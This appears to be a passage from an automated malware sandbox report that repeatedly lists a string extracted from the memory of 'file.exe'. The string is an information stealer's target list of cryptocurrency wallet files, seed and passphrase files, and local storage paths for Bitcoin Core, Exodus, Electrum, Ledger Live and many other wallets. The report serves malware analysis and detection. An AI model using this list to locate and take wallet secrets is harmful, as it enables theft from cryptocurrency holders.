Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2625469567.00000000012A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2625469567.00000000012A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2625469567.00000000012A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2625469567.00000000012A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2625469567.00000000012A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2625469567.00000000012A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2625469567.00000000012A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2625469567.00000000012A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2625469567.00000000012A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2625469567.00000000012A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2625469567.00000000012A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2625469567.00000000012A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia 